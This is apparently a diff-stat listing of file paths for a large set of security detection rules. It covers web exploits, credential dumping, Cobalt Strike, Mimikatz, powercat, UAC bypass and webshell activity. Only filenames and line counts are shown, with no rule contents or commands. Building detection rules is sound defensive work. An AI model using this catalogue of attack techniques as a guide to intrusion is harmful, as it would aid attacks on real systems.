.../rules/others_proxy/proxy_ua_hacktool.yml | 79 + .../rules/others_proxy/proxy_ua_malware.yml | 85 + bin/main/rules/others_proxy/proxy_ua_susp.yml | 47 + .../proxy_ursnif_malware_c2_url.yml | 36 + .../proxy_ursnif_malware_download_url.yml | 25 + .../rules/others_web/web_apache_segfault.yml | 21 + .../others_web/web_apache_threading_error.yml | 18 + ...web_cve_2010_5278_exploitation_attempt.yml | 24 + ...18_13379_fortinet_preauth_read_exploit.yml | 27 + .../web_cve_2018_2894_weblogic_exploit.yml | 28 + ...web_cve_2019_11510_pulsesecure_exploit.yml | 26 + .../web_cve_2019_19781_citrix_exploit.yml | 34 + .../web_cve_2019_3398_confluence.yml | 27 + .../web_cve_2020_0688_exchange_exploit.yml | 24 + .../web_cve_2020_0688_msexchange.yml | 29 + .../web_cve_2020_10148_solarwinds_exploit.yml | 31 + .../web_cve_2020_14882_weblogic_exploit.yml | 29 + ...cve_2020_28188_terramaster_rce_exploit.yml | 36 + .../web_cve_2020_3452_cisco_asa_ftd.yml | 35 + .../others_web/web_cve_2020_5902_f5_bigip.yml | 33 + .../web_cve_2020_8193_8195_citrix_exploit.yml | 33 + ...090_2021_20091_arcadyan_router_exploit.yml | 40 + ...web_cve_2021_2109_weblogic_rce_exploit.yml | 29 + ..._2021_21972_vsphere_unauth_rce_exploit.yml | 27 + ...2021_21978_vmware_view_planner_exploit.yml | 30 + .../web_cve_2021_22005_vmware_file_upload.yml | 22 + .../web_cve_2021_22123_fortinet_exploit.yml | 30 + ...ve_2021_22893_pulse_secure_rce_exploit.yml | 34 + .../web_cve_2021_26814_wzuh_rce.yml | 25 + .../others_web/web_cve_2021_26858_iis_rce.yml | 32 + .../web_cve_2021_28480_exchange_exploit.yml | 23 + ...b_cve_2021_33766_msexchange_proxytoken.yml | 32 + .../web_cve_2021_40539_adselfservice.yml | 20 + ...539_manageengine_adselfservice_exploit.yml | 32 + ...b_cve_2021_41773_apache_path_traversal.yml | 36 + ...eb_cve_2021_42237_sitecore_report_ashx.yml | 23 + .../others_web/web_cve_2021_43798_grafana.yml | 79 + .../others_web/web_cve_2021_44228_log4j.yml | 51 + .../web_cve_2021_44228_log4j_fields.yml | 124 + .../web_exchange_exploitation_hafnium.yml | 62 + .../others_web/web_exchange_proxyshell.yml | 38 + .../web_exchange_proxyshell_successful.yml | 31 + .../web_iis_tilt_shortname_scan.yml | 30 + .../web_java_payload_in_access_logs.yml | 31 + .../rules/others_web/web_jndi_exploit.yml | 37 + ...multiple_susp_resp_codes_single_source.yml | 30 + .../rules/others_web/web_nginx_core_dump.yml | 21 + ...eb_path_traversal_exploitation_attempt.yml | 24 + .../web_solarwinds_supernova_webshell.yml | 30 + .../web_sonicwall_jarrewrite_exploit.yml | 27 + .../web_source_code_enumeration.yml | 27 + .../web_sql_injection_in_access_logs.yml | 53 + .../others_web/web_ssti_in_access_logs.yml | 32 + .../others_web/web_susp_windows_path_uri.yml | 27 + .../web_unc2546_dewmode_php_webshell.yml | 31 + .../rules/others_web/web_webshell_regeorg.yml | 36 + .../web_win_webshells_in_access_logs.yml | 41 + .../others_web/web_xss_in_access_logs.yml | 45 + bin/main/rules/rule_categories.json | 60 + .../s3/aws_s3_data_management_tampering.yml | 36 + ...ns_query_win_regsvr32_network_activity.yml | 35 + ...nnection_win_regsvr32_network_activity.yml | 32 + ...proc_creation_win_susp_regsvr32_no_dll.yml | 38 + .../proc_creation_win_system_exe_anomaly.yml | 81 + .../rules/test_windows/win_sample_rule.yml | 24 + .../aws_waf/aws_waf_web_susp_useragents.yml | 29 + ..._ruckus_wireless_admin_exploit_attempt.yml | 30 + .../waf/web_sql_injection_in_access_logs.yml | 60 + bin/main/rules/waf/web_susp_useragents.yml | 28 + bin/main/rules/waf/web_xss_in_access_logs.yml | 48 + .../builtin/application/win_audit_cve.yml | 36 + .../application/win_av_relevant_match.yml | 63 + .../win_builtin_remove_application.yml | 22 + .../win_software_atera_rmm_agent_install.yml | 23 + .../application/win_susp_backup_delete.yml | 24 + .../application/win_susp_msmpeng_crash.yml | 31 + .../application/win_vul_cve_2020_0688.yml | 27 + .../application/win_vul_cve_2021_41379.yml | 24 + ..._applocker_file_was_not_allowed_to_run.yml | 40 + .../win_bits_client_susp_domain.yml | 36 + .../win_bits_client_susp_local_file.yml | 34 + .../win_bits_client_susp_local_folder.yml | 28 + .../win_bits_client_susp_powershell_job.yml | 25 + .../win_bits_client_susp_use_bitsadmin.yml | 25 + .../win_bits_client_uncommon_domain.yml | 30 + .../win_codeintegrity_failed_driver_load.yml | 20 + .../builtin/dns_server/win_apt_gallium.yml | 35 + .../dns_server/win_susp_dns_config.yml | 26 + .../win_usb_device_plugged.yml | 27 + .../firewall_as/win_firewall_as_add_rule.yml | 31 + .../win_firewall_as_change_rule.yml | 21 + .../win_firewall_as_delete_rule.yml | 25 + .../firewall_as/win_firewall_as_failed.yml | 17 + .../firewall_as/win_firewall_as_reset.yml | 17 + .../win_firewall_as_setting_change.yml | 22 + .../windows/builtin/ldap/win_ldap_recon.yml | 76 + .../win_exchange_cve_2021_42321.yml | 26 + .../win_exchange_proxylogon_oabvirtualdir.yml | 27 + ...ange_proxyshell_certificate_generation.yml | 29 + ...win_exchange_proxyshell_mailbox_export.yml | 31 + ...hange_proxyshell_remove_mailbox_export.yml | 23 + .../win_exchange_transportagent.yml | 27 + .../win_exchange_transportagent_failed.yml | 25 + ...in_set_oabvirtualdirectory_externalurl.yml | 25 + .../builtin/ntlm/win_susp_ntlm_auth.yml | 25 + .../ntlm/win_susp_ntlm_brute_force.yml | 32 + .../builtin/ntlm/win_susp_ntlm_rdp.yml | 31 + ...win_exploit_cve_2021_1675_printspooler.yml | 45 + ...cve_2021_1675_printspooler_operational.yml | 29 + .../win_aadhealth_mon_agent_regkey_access.yml | 35 + .../win_aadhealth_svc_agent_regkey_access.yml | 37 + .../win_account_backdoor_dcsync_rights.yml | 33 + .../security/win_account_discovery.yml | 38 + .../win_ad_object_writedac_access.yml | 27 + ...win_ad_replication_non_machine_account.yml | 34 + .../security/win_ad_user_enumeration.yml | 31 + ...e_template_configuration_vulnerability.yml | 28 + ...mplate_configuration_vulnerability_eku.yml | 42 + .../builtin/security/win_admin_rdp_login.yml | 29 + .../security/win_admin_share_access.yml | 24 + ...in_alert_active_directory_user_control.yml | 25 + .../security/win_alert_ad_user_backdoors.yml | 38 + .../win_alert_enable_weak_encryption.yml | 89 + .../builtin/security/win_alert_ruler.yml | 36 + .../win_apt_chafer_mar18_security.yml | 35 + .../builtin/security/win_apt_slingshot.yml | 28 + .../builtin/security/win_apt_wocao.yml | 31 + .../builtin/security/win_atsvc_task.yml | 29 + .../security/win_camera_microphone_access.yml | 29 + .../win_dce_rpc_smb_spoolss_named_pipe.yml | 26 + .../security/win_dcom_iertutil_dll_hijack.yml | 26 + .../windows/builtin/security/win_dcsync.yml | 42 + .../builtin/security/win_defender_bypass.yml | 28 + .../security/win_disable_event_logging.yml | 26 + .../win_dpapi_domain_backupkey_extraction.yml | 25 + ..._dpapi_domain_masterkey_backup_attempt.yml | 26 + .../builtin/security/win_etw_modification.yml | 33 + .../security/win_event_log_cleared.yml | 27 + ...it_cve_2021_1675_printspooler_security.yml | 27 + .../builtin/security/win_external_device.yml | 25 + .../win_global_catalog_enumeration.yml | 27 + .../security/win_gpo_scheduledtasks.yml | 30 + .../security/win_hidden_user_creation.yml | 25 + ...n_hybridconnectionmgr_svc_installation.yml | 24 + .../builtin/security/win_impacket_psexec.yml | 28 + .../security/win_impacket_secretdump.yml | 29 + ...oke_obfuscation_clip_services_security.yml | 33 + ...ation_obfuscated_iex_services_security.yml | 33 + ...ke_obfuscation_stdin_services_security.yml | 38 + ...voke_obfuscation_var_services_security.yml | 28 + ...scation_via_compress_services_security.yml | 35 + ...fuscation_via_rundll_services_security.yml | 32 + ...bfuscation_via_stdin_services_security.yml | 34 + ...scation_via_use_clip_services_security.yml | 28 + ...cation_via_use_mshta_services_security.yml | 32 + ...ion_via_use_rundll32_services_security.yml | 37 + ..._obfuscation_via_var_services_security.yml | 28 + .../builtin/security/win_iso_mount.yml | 30 + .../builtin/security/win_lm_namedpipe.yml | 45 + .../win_lolbas_execution_of_nltest.yml | 30 + .../win_lsass_access_non_system_account.yml | 62 + .../builtin/security/win_mal_wceaux_dll.yml | 29 + .../win_metasploit_authentication.yml | 31 + .../security/win_net_ntlm_downgrade.yml | 36 + .../win_net_share_obj_susp_desktop_ini.yml | 30 + ..._renamed_user_account_with_dollar_sign.yml | 27 + .../security/win_not_allowed_rdp_access.yml | 26 + .../security/win_overpass_the_hash.yml | 26 + .../builtin/security/win_pass_the_hash.yml | 32 + .../builtin/security/win_pass_the_hash_2.yml | 33 + .../security/win_petitpotam_network_share.yml | 27 + .../win_petitpotam_susp_tgt_request.yml | 37 + .../security/win_possible_dc_shadow.yml | 30 + .../security/win_privesc_cve_2020_1472.yml | 28 + .../win_protected_storage_service_access.yml | 24 + .../security/win_rare_schtasks_creations.yml | 26 + .../security/win_rdp_bluekeep_poc_scanner.yml | 25 + .../security/win_rdp_localhost_login.yml | 27 + .../security/win_rdp_reverse_tunnel.yml | 42 + ...n_register_new_logon_process_by_rubeus.yml | 24 + .../win_remote_powershell_session.yml | 26 + ..._registry_management_using_reg_utility.yml | 30 + .../win_sam_registry_hive_handle_request.yml | 32 + ...samaccountname_spoofing_cve_2021_42287.yml | 24 + .../security/win_scheduled_task_deletion.yml | 28 + .../win_scm_database_handle_failure.yml | 27 + .../win_scm_database_privileged_operation.yml | 28 + ...scrcons_remote_wmi_scripteventconsumer.yml | 28 + ...security_cobaltstrike_service_installs.yml | 44 + .../security/win_security_mal_creddumper.yml | 40 + .../win_security_mal_service_installs.yml | 33 + ...or_impacket_smb_psexec_service_install.yml | 40 + ...cobaltstrike_getsystem_service_install.yml | 56 + ...powershell_script_installed_as_service.yml | 28 + .../win_security_tap_driver_installation.yml | 24 + .../security/win_security_wmi_persistence.yml | 29 + .../win_smb_file_creation_admin_shares.yml | 27 + .../security/win_susp_add_domain_trust.yml | 19 + .../security/win_susp_add_sid_history.yml | 32 + .../win_susp_codeintegrity_check_failure.yml | 22 + .../win_susp_dsrm_password_change.yml | 22 + .../security/win_susp_eventlog_cleared.yml | 32 + .../win_susp_failed_logon_reasons.yml | 38 + .../security/win_susp_failed_logon_source.yml | 53 + ...usp_failed_logons_explicit_credentials.yml | 28 + .../win_susp_failed_logons_single_process.yml | 32 + .../win_susp_failed_logons_single_source.yml | 28 + .../win_susp_failed_logons_single_source2.yml | 30 + ...p_failed_logons_single_source_kerberos.yml | 32 + ..._failed_logons_single_source_kerberos2.yml | 32 + ..._failed_logons_single_source_kerberos3.yml | 32 + ..._susp_failed_logons_single_source_ntlm.yml | 31 + ...susp_failed_logons_single_source_ntlm2.yml | 31 + ...usp_failed_remote_logons_single_source.yml | 30 + .../security/win_susp_interactive_logons.yml | 31 + .../win_susp_kerberos_manipulation.yml | 55 + .../builtin/security/win_susp_krbrelayup.yml | 27 + .../security/win_susp_ldap_dataexchange.yml | 29 + .../win_susp_local_anon_logon_created.yml | 26 + .../win_susp_logon_explicit_credentials.yml | 33 + .../builtin/security/win_susp_lsass_dump.yml | 25 + .../security/win_susp_lsass_dump_generic.yml | 82 + ...susp_multiple_files_renamed_or_deleted.yml | 28 + .../security/win_susp_net_recon_activity.yml | 34 + .../win_susp_opened_encrypted_zip.yml | 21 + ...win_susp_opened_encrypted_zip_filename.yml | 29 + .../win_susp_opened_encrypted_zip_outlook.yml | 21 + .../win_susp_outbound_kerberos_connection.yml | 29 + .../builtin/security/win_susp_psexec.yml | 30 + .../win_susp_raccess_sensitive_fext.yml | 39 + .../security/win_susp_rc4_kerberos.yml | 28 + .../security/win_susp_rottenpotato.yml | 27 + .../builtin/security/win_susp_samr_pwset.yml | 24 + .../builtin/security/win_susp_sdelete.yml | 35 + .../security/win_susp_time_modification.yml | 33 + .../builtin/security/win_susp_wmi_login.yml | 21 + .../security/win_svcctl_remote_service.yml | 27 + .../security/win_syskey_registry_access.yml | 30 + .../win_sysmon_channel_reference_deletion.yml | 36 + ...ith_credential_data_via_network_shares.yml | 34 + ...win_user_added_to_local_administrators.yml | 30 + ...ileged_service_lsaregisterlogonprocess.yml | 26 + .../builtin/security/win_user_creation.yml | 28 + .../security/win_user_driver_loaded.yml | 40 + ..._vssaudit_secevent_source_registration.yml | 26 + .../win_wmiprvse_wbemcomn_dll_hijack.yml | 28 + .../win_hybridconnectionmgr_svc_running.yml | 29 + .../smbclient/win_susp_failed_guest_logon.yml | 30 + .../system/win_apt_carbonpaper_turla.yml | 28 + .../system/win_apt_chafer_mar18_system.yml | 33 + .../builtin/system/win_apt_stonedrill.yml | 26 + .../system/win_apt_turla_service_png.yml | 25 + .../win_cobaltstrike_service_installs.yml | 42 + .../builtin/system/win_eventlog_cleared.yml | 31 + .../builtin/system/win_hack_smbexec.yml | 30 + .../win_invoke_obfuscation_clip_services.yml | 29 + ...ke_obfuscation_obfuscated_iex_services.yml | 30 + .../win_invoke_obfuscation_stdin_services.yml | 26 + .../win_invoke_obfuscation_var_services.yml | 26 + ...voke_obfuscation_via_compress_services.yml | 32 + ...invoke_obfuscation_via_rundll_services.yml | 30 + ..._invoke_obfuscation_via_stdin_services.yml | 26 + ...voke_obfuscation_via_use_clip_services.yml | 26 + ...oke_obfuscation_via_use_mshta_services.yml | 28 + ..._obfuscation_via_use_rundll32_services.yml | 35 + ...in_invoke_obfuscation_via_var_services.yml | 26 + .../builtin/system/win_lsasrv_ntlmv1.yml | 27 + .../builtin/system/win_mal_creddumper.yml | 38 + ...tstrike_getsystem_service_installation.yml | 55 + .../builtin/system/win_moriya_rootkit.yml | 25 + .../builtin/system/win_ntfs_vuln_exploit.yml | 29 + .../builtin/system/win_pcap_drivers.yml | 40 + ...gon_exploitation_using_wellknown_tools.yml | 26 + ...powershell_script_installed_as_service.yml | 26 + ...rkspwdump_clearing_hive_access_history.yml | 23 + .../system/win_rare_service_installs.yml | 25 + .../win_rdp_potential_cve_2019_0708.yml | 27 + .../builtin/system/win_sample_rule.yml | 24 + ...curity_krbrelayup_service_installation.yml | 23 + .../builtin/system/win_service_hacktools.yml | 36 + ..._service_install_susp_double_ampersand.yml | 23 + .../builtin/system/win_susp_dhcp_config.yml | 25 + .../system/win_susp_dhcp_config_failed.yml | 28 + .../builtin/system/win_susp_proceshacker.yml | 27 + .../builtin/system/win_susp_sam_dump.yml | 25 + .../system/win_susp_service_installation.yml | 48 + .../win_susp_service_installation_folder.yml | 27 + ...sp_service_installation_folder_pattern.yml | 26 + .../win_susp_service_installation_script.yml | 32 + .../system/win_susp_system_update_error.yml | 27 + .../win_system_application_sysmon_crash.yml | 21 + .../system/win_system_defender_disabled.yml | 32 + .../win_system_susp_eventlog_cleared.yml | 33 + .../system/win_tap_driver_installation.yml | 22 + .../builtin/system/win_tool_psexec.yml | 38 + .../system/win_volume_shadow_copy_mount.yml | 24 + .../builtin/system/win_vul_cve_2020_1472.yml | 25 + ...n_vul_cve_2021_42278_or_cve_2021_42287.yml | 36 + .../win_rare_schtask_creation.yml | 24 + .../win_terminalservices_rdp_ngrok.yml | 23 + .../builtin/win_alert_mimikatz_keywords.yml | 51 + .../builtin/win_susp_logon_newcredentials.yml | 19 + .../windefend/win_alert_lsass_access.yml | 47 + .../windefend/win_defender_amsi_trigger.yml | 23 + .../windefend/win_defender_disabled.yml | 27 + .../windefend/win_defender_exclusions.yml | 23 + .../windefend/win_defender_history_delete.yml | 26 + .../windefend/win_defender_psexec_wmi_asr.yml | 29 + ...win_defender_tamper_protection_trigger.yml | 24 + .../builtin/windefend/win_defender_threat.yml | 25 + .../builtin/wmi/win_wmi_persistence.yml | 37 + .../create_remote_thread_win_susp_targets.yml | 24 + .../create_remote_thread_win_ttdinjec.yml | 22 + .../sysmon_cactustorch.yml | 34 + .../sysmon_cobaltstrike_process_injection.yml | 26 + .../sysmon_createremotethread_loadlibrary.yml | 23 + .../sysmon_password_dumper_keepass.yml | 23 + .../sysmon_password_dumper_lsass.yml | 24 + .../sysmon_powershell_code_injection.yml | 23 + .../sysmon_susp_powershell_rundll32.yml | 25 + .../sysmon_susp_remote_thread.yml | 97 + .../sysmon_ads_executable.yml | 29 + .../sysmon_regedit_export_to_ads.yml | 25 + .../windows/dns_query/dns_query_win_ammyy.yml | 24 + .../dns_query/dns_query_win_gotoopener.yml | 21 + ...ery_win_hybridconnectionmgr_servicebus.yml | 23 + .../dns_query_win_lobas_appinstaller.yml | 23 + .../dns_query/dns_query_win_logmein.yml | 24 + .../dns_query_win_mal_cobaltstrike.yml | 29 + .../dns_query/dns_query_win_mega_nz.yml | 21 + .../dns_query_win_possible_dns_rebinding.yml | 43 + ...ns_query_win_regsvr32_network_activity.yml | 35 + .../dns_query/dns_query_win_susp_ipify.yml | 47 + .../dns_query_win_susp_teamviewer.yml | 27 + .../dns_query/dns_query_win_tor_onion.yml | 21 + .../dns_query/dns_query_win_ufile_io.yml | 21 + .../driver_load_mal_creddumper.yml | 39 + ...tstrike_getsystem_service_installation.yml | 54 + ...powershell_script_installed_as_service.yml | 27 + .../driver_load/driver_load_susp_temp_use.yml | 21 + .../driver_load_vuln_dell_driver.yml | 30 + .../driver_load/driver_load_windivert.yml | 26 + ...access_win_browser_credential_stealing.yml | 46 + ...ete_win_cve_2021_1675_printspooler_del.yml | 27 + .../file_delete_win_delete_appli_log.yml | 24 + .../file_delete_win_delete_backup_file.yml | 31 + .../file_delete_win_delete_prefetch.yml | 26 + ...win_sysinternals_sdelete_file_deletion.yml | 25 + ...ile_event_win_access_susp_unattend_xml.yml | 23 + .../file_event_win_advanced_ip_scanner.yml | 29 + .../file_event_win_anydesk_artefact.yml | 27 + ...file_event_win_apt_unidentified_nov_18.yml | 24 + .../file_event_win_crackmapexec_patterns.yml | 58 + ...e_event_win_creation_new_shim_database.yml | 24 + ...ile_event_win_creation_scr_binary_file.yml | 28 + .../file_event_win_creation_system_file.yml | 64 + ...ent_win_creation_unquoted_service_path.yml | 24 + ...vent_win_cred_dump_tools_dropped_files.yml | 51 + ...file_event_win_csharp_compile_artefact.yml | 24 + ...e_event_win_cve_2021_1675_printspooler.yml | 30 + ...le_event_win_cve_2021_26858_msexchange.yml | 34 + ...cve_2021_31979_cve_2021_33771_exploits.yml | 37 + .../file_event_win_cve_2021_41379_msi_lpe.yml | 28 + ...t_win_cve_2021_44077_poc_default_files.yml | 22 + .../file_event_win_cve_2022_24527_lpe.yml | 26 + ..._event_win_detect_powerup_dllhijacking.yml | 27 + .../file_event_win_ghostpack_safetykatz.yml | 22 + .../file_event_win_gotoopener_artefact.yml | 24 + .../file_event_win_hack_dumpert.yml | 26 + ...e_event_win_hivenightmare_file_exports.yml | 36 + .../file_event/file_event_win_hktl_nppspy.yml | 23 + ...e_event_win_install_teamviewer_desktop.yml | 21 + .../file_event_win_iso_file_recent.yml | 26 + .../file_event/file_event_win_lsass_dump.yml | 50 + ...nt_win_lsass_memory_dump_file_creation.yml | 27 + .../file_event_win_lsass_werfault_dump.yml | 24 + .../file_event/file_event_win_macro_file.yml | 36 + .../file_event/file_event_win_mal_adwind.yml | 30 + .../file_event_win_mal_octopus_scanner.yml | 24 + .../file_event_win_mal_vhd_download.yml | 34 + ...event_win_mimikatz_kirbi_file_creation.yml | 21 + ...le_event_win_mimimaktz_memssp_log_file.yml | 21 + .../file_event_win_moriya_rootkit.yml | 26 + .../file_event_win_new_src_file.yml | 29 + ...vent_win_notepad_plus_plus_persistence.yml | 30 + .../file_event/file_event_win_ntds_dit.yml | 45 + .../file_event_win_ntds_exfil_tools.yml | 25 + .../file_event_win_office_persistence.yml | 31 + ...le_event_win_outlook_c2_macro_creation.yml | 24 + .../file_event_win_outlook_newform.yml | 25 + .../file_event_win_pcre_net_temp_file.yml | 23 + .../file_event_win_pingback_backdoor.yml | 24 + ...e_event_win_powershell_exploit_scripts.yml | 216 + ...event_win_powershell_startup_shortcuts.yml | 25 + .../file_event_win_quarkspw_filedump.yml | 25 + .../file_event_win_rclone_exec_file.yml | 24 + ...e_event_win_redmimicry_winnti_filedrop.yml | 25 + .../file_event/file_event_win_sam_dump.yml | 45 + .../file_event_win_screenconnect_artefact.yml | 24 + ...ript_creation_by_office_using_file_ext.yml | 54 + ...le_event_win_startup_folder_file_write.yml | 23 + .../file_event_win_susp_adsi_cache_usage.yml | 40 + .../file_event_win_susp_clr_logs.yml | 37 + .../file_event_win_susp_colorcpl.yml | 27 + ...ile_event_win_susp_creation_by_mobsync.yml | 28 + ...e_event_win_susp_default_gpo_dir_write.yml | 24 + .../file_event_win_susp_desktop_ini.yml | 28 + .../file_event_win_susp_desktop_txt.yml | 25 + ..._event_win_susp_desktopimgdownldr_file.yml | 34 + .../file_event_win_susp_diagcab.yml | 20 + .../file_event_win_susp_dropper.yml | 50 + ...ile_event_win_susp_exchange_aspx_write.yml | 26 + .../file_event_win_susp_get_variable.yml | 27 + .../file_event_win_susp_ntds_dit.yml | 26 + .../file_event_win_susp_pfx_file_creation.yml | 23 + ...ent_win_susp_powershell_profile_create.yml | 29 + ...cexplorer_driver_created_in_tmp_folder.yml | 29 + ...win_susp_system_interactive_powershell.yml | 21 + .../file_event_win_susp_task_write.yml | 27 + ...ent_win_susp_teamviewer_remote_session.yml | 27 + .../file_event_win_susp_winword_startup.yml | 31 + .../file_event/file_event_win_tool_psexec.yml | 35 + ...e_event_win_tsclient_filewrite_startup.yml | 21 + ..._event_win_uac_bypass_consent_comctl32.yml | 23 + ...e_event_win_uac_bypass_dotnet_profiler.yml | 23 + .../file_event_win_uac_bypass_eventvwr.yml | 27 + ...ent_win_uac_bypass_idiagnostic_profile.yml | 25 + .../file_event_win_uac_bypass_ieinstal.yml | 25 + ...file_event_win_uac_bypass_msconfig_gui.yml | 23 + ...vent_win_uac_bypass_ntfs_reparse_point.yml | 23 + .../file_event_win_uac_bypass_winsat.yml | 25 + .../file_event_win_uac_bypass_wmp.yml | 26 + ...ile_event_win_webshell_creation_detect.yml | 45 + .../file_event_win_werfault_dll_hijacking.yml | 29 + ..._event_win_win_cscript_wscript_dropper.yml | 36 + ...ent_win_win_shell_write_susp_directory.yml | 47 + .../file_event_win_winrm_awl_bypass.yml | 31 + .../file_event_win_winword_cve_2021_40444.yml | 36 + ...ersistence_script_event_consumer_write.yml | 22 + ...event_win_wmiprvse_wbemcomn_dll_hijack.yml | 25 + .../file_event_win_word_template_creation.yml | 41 + ...le_event_win_writing_local_admin_share.yml | 25 + .../file_rename_win_not_dll_to_dll.yml | 30 + .../image_load_abusing_azure_browser_sso.yml | 35 + ..._alternate_powershell_hosts_moduleload.yml | 32 + .../image_load_foggyweb_nobelium.yml | 21 + .../image_load_in_memory_powershell.yml | 61 + ...image_load_mimikatz_inmemory_detection.yml | 42 + .../image_load/image_load_msdt_sdiageng.yml | 24 + .../image_load/image_load_pcre_net_load.yml | 23 + .../image_load_pingback_backdoor.yml | 24 + ...cons_imageload_wmi_scripteventconsumer.yml | 31 + .../image_load_silenttrinity_stage_use.yml | 25 + .../image_load_spoolsv_dll_load.yml | 31 + .../image_load_susp_advapi32_dll.yml | 34 + .../image_load_susp_dbghelp_dbgcore_load.yml | 69 + .../image_load/image_load_susp_fax_dll.yml | 27 + .../image_load/image_load_susp_image_load.yml | 25 + ...d_susp_office_dotnet_assembly_dll_load.yml | 27 + ...e_load_susp_office_dotnet_clr_dll_load.yml | 27 + ...e_load_susp_office_dotnet_gac_dll_load.yml | 27 + ...mage_load_susp_office_dsparse_dll_load.yml | 27 + ...age_load_susp_office_kerberos_dll_load.yml | 27 + .../image_load_susp_python_image_load.yml | 31 + ...e_load_susp_script_dotnet_clr_dll_load.yml | 32 + .../image_load_susp_system_drawing_load.yml | 37 + .../image_load_susp_vss_ps_load.yml | 42 + .../image_load_susp_winword_vbadll_load.yml | 30 + ...e_load_svchost_dll_search_order_hijack.yml | 30 + .../image_load_tttracer_mod_load.yml | 29 + .../image_load_uac_bypass_via_dism.yml | 28 + .../image_load_uipromptforcreds_dlls.yml | 42 + ..._load_unsigned_image_loaded_into_lsass.yml | 23 + .../image_load_usp_svchost_clfsw32.yml | 23 + .../image_load/image_load_wmi_module_load.yml | 65 + ...persistence_commandline_event_consumer.yml | 23 + ...ge_load_wmic_remote_xsl_scripting_dlls.yml | 27 + ...mage_load_wmiprvse_wbemcomn_dll_hijack.yml | 25 + .../image_load_wsman_provider_image_load.yml | 61 + ..._connection_susp_win_binary_no_cmdline.yml | 32 + .../net_connection_win_binary_github_com.yml | 31 + .../net_connection_win_binary_susp_com.yml | 36 + .../net_connection_win_crypto_mining.yml | 43 + ...connection_win_dllhost_net_connections.yml | 54 + .../net_connection_win_eqnedt.yml | 22 + ..._win_excel_outbound_network_connection.yml | 47 + .../net_connection_win_imewdbld.yml | 23 + ...nnection_win_malware_backconnect_ports.yml | 97 + .../net_connection_win_mega_nz.yml | 23 + .../net_connection_win_msiexec.yml | 25 + ...nection_win_notepad_network_connection.yml | 27 + ...tion_win_powershell_network_connection.yml | 49 + .../net_connection_win_python.yml | 23 + .../net_connection_win_rdp_reverse_tunnel.yml | 32 + .../net_connection_win_rdp_to_http.yml | 30 + ...nnection_win_regsvr32_network_activity.yml | 32 + ..._win_remote_powershell_session_network.yml | 31 + ...onnection_win_rundll32_net_connections.yml | 51 + ..._silenttrinity_stager_msbuild_activity.yml | 27 + .../net_connection_win_susp_dropbox_api.yml | 24 + ..._win_susp_outbound_kerberos_connection.yml | 32 + ...n_win_susp_outbound_mobsync_connection.yml | 45 + ...ion_win_susp_outbound_smtp_connections.yml | 36 + ..._susp_prog_location_network_connection.yml | 39 + .../net_connection_win_susp_rdp.yml | 52 + ...nection_win_wuauclt_network_connection.yml | 22 + ...reated_alternate_powershell_hosts_pipe.yml | 50 + .../pipe_created_apt_turla_namedpipes.yml | 31 + ...pe_created_cred_dump_tools_named_pipes.yml | 29 + .../pipe_created_efspotato_namedpipe.yml | 29 + .../pipe_created_mal_cobaltstrike.yml | 36 + .../pipe_created_mal_cobaltstrike_re.yml | 43 + .../pipe_created_mal_namedpipes.yml | 63 + ...pipe_created_powershell_execution_pipe.yml | 22 + .../pipe_created_psexec_pipes_artifacts.yml | 27 + ...created_susp_adfs_namedpipe_connection.yml | 34 + ...reated_susp_cobaltstrike_pipe_patterns.yml | 60 + ...pe_created_susp_wmi_consumer_namedpipe.yml | 22 + .../pipe_created/pipe_created_tool_psexec.yml | 36 + .../posh_pc_alternate_powershell_hosts.yml | 31 + .../posh_pc_delete_volume_shadow_copies.yml | 33 + .../posh_pc_downgrade_attack.yml | 26 + .../posh_pc_exe_calling_ps.yml | 28 + .../powershell_classic/posh_pc_powercat.yml | 30 + .../posh_pc_remote_powershell_session.yml | 29 + .../posh_pc_renamed_powershell.yml | 27 + ...susp_athremotefxvgpudisablementcommand.yml | 38 + .../posh_pc_susp_download.yml | 30 + .../posh_pc_susp_get_nettcpconnection.yml | 22 + .../posh_pc_susp_zip_compress.yml | 30 + .../posh_pc_tamper_with_windows_defender.yml | 29 + ...sh_pc_wsman_com_provider_no_powershell.yml | 29 + .../posh_pc_xor_commandline.yml | 26 + .../posh_pm_alternate_powershell_hosts.yml | 33 + .../posh_pm_bad_opsec_artifacts.yml | 34 + .../posh_pm_clear_powershell_history.yml | 41 + .../posh_pm_decompress_commands.yml | 27 + .../posh_pm_get_addbaccount.yml | 26 + .../posh_pm_get_clipboard.yml | 24 + .../posh_pm_invoke_obfuscation_clip.yml | 28 + ...h_pm_invoke_obfuscation_obfuscated_iex.yml | 34 + .../posh_pm_invoke_obfuscation_stdin.yml | 28 + .../posh_pm_invoke_obfuscation_var.yml | 28 + ...osh_pm_invoke_obfuscation_via_compress.yml | 34 + .../posh_pm_invoke_obfuscation_via_rundll.yml | 32 + .../posh_pm_invoke_obfuscation_via_stdin.yml | 28 + ...osh_pm_invoke_obfuscation_via_use_clip.yml | 28 + ...sh_pm_invoke_obfuscation_via_use_mhsta.yml | 34 + ...pm_invoke_obfuscation_via_use_rundll32.yml | 37 + .../posh_pm_invoke_obfuscation_via_var.yml | 28 + .../powershell_module/posh_pm_powercat.yml | 27 + .../posh_pm_remote_powershell_session.yml | 30 + .../posh_pm_susp_ad_group_reco.yml | 36 + ...susp_athremotefxvgpudisablementcommand.yml | 35 + .../posh_pm_susp_download.yml | 27 + .../posh_pm_susp_get_nettcpconnection.yml | 22 + .../posh_pm_susp_invocation_generic.yml | 34 + .../posh_pm_susp_invocation_specific.yml | 70 + .../posh_pm_susp_local_group_reco.yml | 36 + ..._pm_susp_reset_computermachinepassword.yml | 22 + .../posh_pm_susp_smb_share_reco.yml | 25 + .../posh_pm_susp_zip_compress.yml | 30 + .../posh_pm_syncappvpublishingserver_exe.yml | 27 + .../posh_ps_access_to_browser_login_data.yml | 37 + .../posh_ps_accessing_win_api.yml | 73 + .../posh_ps_adrecon_execution.yml | 27 + .../posh_ps_as_rep_roasting.yml | 29 + .../posh_ps_automated_collection.yml | 37 + .../posh_ps_azurehound_commands.yml | 30 + .../posh_ps_capture_screenshots.yml | 23 + .../posh_ps_cl_invocation_lolscript.yml | 26 + .../posh_ps_cl_invocation_lolscript_count.yml | 28 + .../posh_ps_cl_mutexverifiers_lolscript.yml | 26 + ...h_ps_cl_mutexverifiers_lolscript_count.yml | 28 + .../posh_ps_clear_powershell_history.yml | 41 + ...sh_ps_clearing_windows_console_history.yml | 32 + .../posh_ps_cmdlet_scheduled_task.yml | 35 + .../posh_ps_copy_item_system32.yml | 24 + .../posh_ps_cor_profiler.yml | 29 + .../posh_ps_create_local_user.yml | 25 + .../posh_ps_create_volume_shadow_copy.yml | 26 + 